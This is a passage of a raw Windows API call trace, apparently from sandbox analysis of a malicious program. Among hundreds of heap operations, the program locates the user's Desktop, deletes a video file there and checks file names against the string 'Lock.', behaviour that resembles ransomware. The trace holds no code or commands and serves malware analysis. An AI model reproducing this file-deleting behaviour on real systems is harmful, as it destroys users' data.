hHeap=0x25c0000) returned 1 [0161.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0161.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0161.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0161.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0161.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0161.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0161.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0161.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0161.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0161.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0161.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0161.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0161.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0161.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0161.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0161.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0161.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0161.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0161.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0161.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0161.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0161.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0161.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0161.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0161.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0161.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0161.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0161.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0161.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0161.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0161.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0161.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0161.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0161.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0161.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0161.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0161.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0161.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0161.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0161.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0161.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0161.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0161.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0161.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0161.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0161.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0161.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0161.240] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0161.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0161.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0161.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0161.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0161.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0161.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0161.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0161.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0161.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0161.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0161.241] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0161.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0161.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0161.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0161.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0161.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0161.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac978 [0161.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0161.241] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0161.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0161.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0161.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0161.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0161.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0161.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0161.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0161.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0161.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0161.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0161.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0161.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0161.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0161.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0161.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0161.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0161.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0161.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0161.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0161.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0161.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0161.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0161.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0161.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0161.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0161.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0161.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x66) returned 0x24202f0 [0161.243] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/81-stuKA.mp4", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\81-stuKA.mp4", lpFilePart=0x8bedfc*="81-stuKA.mp4") returned 0x32 [0161.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0161.243] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\81-stuKA.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\81-stuka.mp4")) returned 0x20 [0161.243] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\81-stuKA.mp4", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91623960, ftCreationTime.dwHighDateTime=0x1d4cb76, ftLastAccessTime.dwLowDateTime=0x11b36480, ftLastAccessTime.dwHighDateTime=0x1d4c6fa, ftLastWriteTime.dwLowDateTime=0x11b36480, ftLastWriteTime.dwHighDateTime=0x1d4c6fa, nFileSizeHigh=0x0, nFileSizeLow=0xdb53, dwReserved0=0x21, dwReserved1=0x4, cFileName="81-stuKA.mp4", cAlternateFileName="")) returned 0xaa56a0 [0161.243] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\81-stuKA.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\81-stuka.mp4")) returned 1 [0161.245] FindNextFileW (in: hFindFile=0xaa56a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91623960, ftCreationTime.dwHighDateTime=0x1d4cb76, ftLastAccessTime.dwLowDateTime=0x11b36480, ftLastAccessTime.dwHighDateTime=0x1d4c6fa, ftLastWriteTime.dwLowDateTime=0x11b36480, ftLastWriteTime.dwHighDateTime=0x1d4c6fa, nFileSizeHigh=0x0, nFileSizeLow=0xdb53, dwReserved0=0x21, dwReserved1=0x4, cFileName="81-stuKA.mp4", cAlternateFileName="")) returned 0 [0161.245] FindClose (in: hFindFile=0xaa56a0 | out: hFindFile=0xaa56a0) returned 1 [0161.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0161.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0161.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0161.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0161.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0161.245] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0161.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0161.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0161.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0161.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0161.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0161.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0161.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0161.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0161.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0161.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0161.246] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0161.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0161.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0161.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac978 [0161.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0161.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0161.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0161.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0161.246] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0161.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0161.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0161.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0161.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0161.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0161.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0161.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0161.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0161.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0161.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0161.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0161.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0161.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0161.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0161.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0161.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0161.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0161.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0161.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0161.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0161.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0161.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0161.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0161.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0161.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0161.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0161.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0161.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0161.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0161.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0161.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0161.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0161.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0161.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0161.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0161.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0161.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0161.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x66) returned 0x24202f0 [0161.249] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/81-stuKA.mp4", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\81-stuKA.mp4", lpFilePart=0x8bf658*="81-stuKA.mp4") returned 0x32 [0161.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0161.249] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\81-stuKA.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\81-stuka.mp4")) returned 0xffffffff [0161.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0161.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0161.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0161.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0161.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0161.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0161.249] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0161.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0161.249] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0161.249] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0161.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0161.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0161.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0161.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0161.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0161.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0161.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0161.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0161.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0161.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0161.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0161.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0161.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0161.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A4XY 5YOfDJ7NlnC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4XY 5YOfDJ7NlnC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XY 5YOfDJ7NlnC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0161.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y 5YOfDJ7NlnC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0161.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 5YOfDJ7NlnC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5YOfDJ7NlnC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YOfDJ7NlnC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0161.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OfDJ7NlnC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0161.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fDJ7NlnC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DJ7NlnC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J7NlnC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7NlnC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NlnC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0161.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lnC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0161.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0161.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 